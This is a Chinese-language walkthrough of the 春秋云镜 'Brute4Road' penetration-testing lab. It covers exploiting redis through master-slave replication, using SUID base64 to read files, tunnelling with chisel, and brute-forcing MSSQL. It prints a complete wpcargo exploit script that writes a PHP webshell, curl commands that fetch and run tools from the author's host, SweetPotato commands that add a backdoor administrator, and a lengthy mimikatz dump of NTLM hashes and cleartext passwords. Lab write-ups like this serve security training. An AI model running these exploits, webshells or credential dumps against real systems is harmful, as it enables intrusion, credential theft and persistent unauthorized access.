春秋云镜:Brute4Road
jerem1ah Lv4

春秋云镜:Brute4Road

https://exp10it.cn/2023/08/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-brute4road-writeup/#flag01

https://fushuling.com/index.php/2023/09/03/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7brute4road/

https://ke1nys.github.io/posts/989b194c.html

https://zysgmzb.club/index.php/archives/241

https://gkjzjh146.github.io/post/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-brute4road/

https://github.com/FunnyWolf/Viper //viper

https://github.com/n0b0dyCN/redis-rogue-server //redis-rogue-server

https://github.com/cdk-team/CDK //cdk

https://github.com/wpscanteam/wpscan //wpscan

https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a //wpcargo RCE exp

https://github.com/biulove0x/CVE-2021-25003 //wpcargo RCE exp

https://github.com/vrana/adminer //adminer.php

https://github.com/GhostPack/Rubeus //Rubeus

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries //Rubeus.exe

https://github.com/gentilkiwi/mimikatz //mimikatz

https://blog.csdn.net/weixin_45329947/article/details/125450389 //redis攻击手法

https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/vulhub/redis-rogue-getshell
https://github.com/Ridter/redis-rce
https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

考点:

  • redis主从复制rce
  • base64命令提权
  • sweetpotato提权
  • 约束性委派

拓扑图:

1
2
39.101.133.201
39.99.234.252
1
2
3
4
5
172.22.2.3 DC
172.22.2.34 CLIENT01
172.22.2.16 MSSQLSERVER 1433,80
172.22.2.18 UBUNTU-WEB02, 80, 22
172.22.2.7 本机

flag01

fscan扫描
redis未授权 主从复制RCE
1
2
3
cd ~/tools/redis-rogue-server-master
python3 redis-rogue-server.py --rhost 39.99.234.252 --lhost 39.105.51.11 --lport 28140
nc -lvvp 7779

image-20231201164003008

SUID提权 base64读文件
1
2
find / -user root -perm -4000 -print 2>/dev/null
base64 "/home/redis/flag/flag01" | base64 -d

image-20231201164035036

image-20231201164104885

1
flag{829b75f2-21f8-4059-a0b1-55b47de6f81c}

flag02

配置代理
1
2
3
#wget http://39.105.51.11/chisel -p /tmp/
curl -o /tmp/chisel 39.105.51.11/chisel
cd /tmp && chmod +x chisel && ./chisel client 39.105.51.11:28190 R:0.0.0.0:28191:socks

image-20231201164435799

cdk ifconfig查看
1
2
curl -o /tmp/cdk 39.105.51.11/cdk_linux_amd64
./cdk ifconfig
fscan扫内网
1
2
curl -o /tmp/fscan 39.105.51.11/fscan
./fscan -h 172.22.2.0/24
wpscan扫描
1
proxychains4 -f /etc/proxychains4.conf wpscan --url "http://172.22.2.18/"
wpcargo RCE
1
proxychains4 -f /etc/proxychains4.conf python3 exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = '''echo "<?php @eval(\$_POST[1]);?>" >> 1.php'''

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
1
2
3
http://172.22.2.18/webshell.php?1=system
post:
2=echo "<?php @eval(\$_POST[1]);?>" >> 1.php

image-20231201165418018

image-20231201165359182

蚁剑连接

image-20231201165429038

查看数据库账号密码
1
2
3
4
/var/www/html/wp-config.php
wpuser
WpuserEha8Fgj9
wordpress

image-20231201165454310

MDUT连接 数据库中有flag

!!!!!

image-20231201171129081

翻到一个密码表 用fscan爆破mssql

image-20231201172010616

1
./fscan.exe -h 172.22.2.16 -m mssql -pwdf pass.txt

image-20231201172138490

MDUT连接mssql
1
2
sa
ElGNkOiC

image-20231201172216934

flag03

SweetPotato提权

image-20231201172701153

1
2
3
激活ole组件,传文件
C:/Users/Public/SweetPotato.exe -a 'whoami'
C:/Users/Public/SweetPotato.exe -a whoami

!!!!!!!!!!!去掉引号

image-20231201172855786

netstat -ano发现3389直接rdp读取flag
1
2
C:/Users/Public/SweetPotato.exe -a "net user jerem1ah qwer1234 /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators jerem1ah /add"
1

image-20231201173535841

flag04

信息收集systeminfo发现在域环境
1
systeminfo
猕猴桃抓域内用户密码
1
2
3
管理员权限运行猕猴桃
privilege::debug
sekurlsa::logonpasswords
翻到MSSQLSERVER$这个用户,MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 11524093 (00000000:00afd7fd)
Session : RemoteInteractive from 2
User Name : jerem1ah
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 17:32:52
SID : S-1-5-21-1403470932-1755135066-2609122076-1027
msv :
[00000003] Primary
* Username : jerem1ah
* Domain : MSSQLSERVER
* NTLM : 0a640404b5c386ab12092587fe19cd02
* SHA1 : c1c5df70d2547d43e891bed7c408177580788726
tspkg :
wdigest :
* Username : jerem1ah
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : jerem1ah
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 11490854 (00000000:00af5626)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/12/1 17:32:51
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 265337 (00000000:00040c79)
Session : Interactive from 1
User Name : William
Domain : XIAORANG
Logon Server : DC
Logon Time : 2023/12/1 16:38:05
SID : S-1-5-21-2704639352-1689326099-2164665914-1106
msv :
[00000003] Primary
* Username : William
* Domain : XIAORANG
* NTLM : 8853911fd59e8d0a82176e085a2157de
* SHA1 : e4fd18cfd47b9a77836c82283fb560e6f465bc40
* DPAPI : da3fc187c1ff105853ec62c10cddd26b
tspkg :
wdigest :
* Username : William
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : William
* Domain : XIAORANG.LAB
* Password : Willg1UoO6Jt
ssp :
credman :

Authentication Id : 0 ; 202352 (00000000:00031670)
Session : Interactive from 0
User Name : MSSQLSERVER15
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1018
msv :
[00000003] Primary
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* NTLM : 6eeb34930fa71d82a464ce235261effd
* SHA1 : 1dfc6d66d9cfdbaa5fc091fedde9a3387771d09b
tspkg :
wdigest :
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202189 (00000000:000315cd)
Session : Interactive from 0
User Name : MSSQLSERVER13
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1016
msv :
[00000003] Primary
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* NTLM : b808e9a53247721e84cc314c870080c5
* SHA1 : 47a42f4a6eed2b2d90f342416f42e2696052f546
tspkg :
wdigest :
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201999 (00000000:0003150f)
Session : Interactive from 0
User Name : MSSQLSERVER11
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1014
msv :
[00000003] Primary
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* NTLM : cee10216b2126aa1a3f239b8201120ef
* SHA1 : 4867093fc519f7d1e91d80e3790ef8a17a7fdd18
tspkg :
wdigest :
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201810 (00000000:00031452)
Session : Interactive from 0
User Name : MSSQLSERVER09
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1012
msv :
[00000003] Primary
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* NTLM : 2dd7fe93426175a9ff3fa928bcf0eb77
* SHA1 : a34c0482568fc9329f33ccdc1852fab9ef65bcd1
tspkg :
wdigest :
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER09
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201719 (00000000:000313f7)
Session : Interactive from 0
User Name : MSSQLSERVER08
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1011
msv :
[00000003] Primary
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* NTLM : 465034ebde60dfae889c3e493e1816bf
* SHA1 : c96428917f7c8a15ea0370716dee153842afaf02
tspkg :
wdigest :
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201629 (00000000:0003139d)
Session : Interactive from 0
User Name : MSSQLSERVER07
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1010
msv :
[00000003] Primary
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* NTLM : f9f990df1bc869cc205d2513b788a5b8
* SHA1 : 79746cfe5a2f1eec4350a6b64d87b01455ef9030
tspkg :
wdigest :
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER07
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201386 (00000000:000312aa)
Session : Interactive from 0
User Name : MSSQLSERVER04
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1007
msv :
[00000003] Primary
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* NTLM : 36bd3cceea3d413e8111b0bef32da84d
* SHA1 : 414d2c783a3fb2ba855e41c243c583bb0604fe02
tspkg :
wdigest :
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201224 (00000000:00031208)
Session : Interactive from 0
User Name : MSSQLSERVER02
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1005
msv :
[00000003] Primary
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* NTLM : 3aa518732551a136003ea41f9599a1ec
* SHA1 : 6f1ed1f677201d998667bd8e3b81cfb52b9a138a
tspkg :
wdigest :
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER02
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201111 (00000000:00031197)
Session : Interactive from 0
User Name : MSSQLSERVER01
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1004
msv :
[00000003] Primary
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* NTLM : ded5ad90b3d8560838a777039641c673
* SHA1 : a2cd9d2963f29b162847e8a1a2c19d5e0641a162
tspkg :
wdigest :
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER01
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 94989 (00000000:0001730d)
Session : Service from 0
User Name : SSASTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-1549978933-2891762758-2075524219-3728768389-1145206490
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 94151 (00000000:00016fc7)
Session : Service from 0
User Name : SQLTELEMETRY
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 62412 (00000000:0000f3cc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/12/1 16:37:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : cea3e66a2715c71423e7d3f0ff6cd352
* SHA1 : 6de4e8f192569bbc44ae94f273870635ae878094
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : (p4Spnv`&9xTZ=D'D/lz[a:94O:$E!7&zfcMza9k;Se"&>cBCBU0bxw.xL"B>\GmtUT,<:q3Yxfq#`O3sLI;OK" (_T_T5- $zV]-i;)c$qIj&$RgttdZI"m
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : MSSQLSERVER$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/12/1 16:37:43
SID : S-1-5-20
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : mssqlserver$
* Domain : XIAORANG.LAB
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 22209 (00000000:000056c1)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/12/1 16:37:32
SID :
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 11524064 (00000000:00afd7e0)
Session : RemoteInteractive from 2
User Name : jerem1ah
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 17:32:52
SID : S-1-5-21-1403470932-1755135066-2609122076-1027
msv :
[00000003] Primary
* Username : jerem1ah
* Domain : MSSQLSERVER
* NTLM : 0a640404b5c386ab12092587fe19cd02
* SHA1 : c1c5df70d2547d43e891bed7c408177580788726
tspkg :
wdigest :
* Username : jerem1ah
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : jerem1ah
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 11491429 (00000000:00af5865)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/12/1 17:32:51
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 202761 (00000000:00031809)
Session : Interactive from 0
User Name : MSSQLSERVER20
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1023
msv :
[00000003] Primary
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* NTLM : f5c512b9cb3052c5ad35e526d44ba85a
* SHA1 : b09c8d9463c494d36e1a4656c15af8e1a7e4568f
tspkg :
wdigest :
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER20
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202680 (00000000:000317b8)
Session : Interactive from 0
User Name : MSSQLSERVER19
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1022
msv :
[00000003] Primary
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* NTLM : 9ce3bb5769303e1258f792792310e33b
* SHA1 : 1a2452c461d89c45f199454f59771f17423e72f9
tspkg :
wdigest :
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202598 (00000000:00031766)
Session : Interactive from 0
User Name : MSSQLSERVER18
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1021
msv :
[00000003] Primary
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* NTLM : 31de1b5e8995c7f91070f4a409599c50
* SHA1 : 070c0d12760e50812236b5717c75222a206aace8
tspkg :
wdigest :
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER18
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202516 (00000000:00031714)
Session : Interactive from 0
User Name : MSSQLSERVER17
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1020
msv :
[00000003] Primary
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* NTLM : 82fe575c8bb18d01df45eb54d0ebc3b4
* SHA1 : 13b87dcba388982dcc44feeba232bb50aa29c7e9
tspkg :
wdigest :
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* Password : (null)
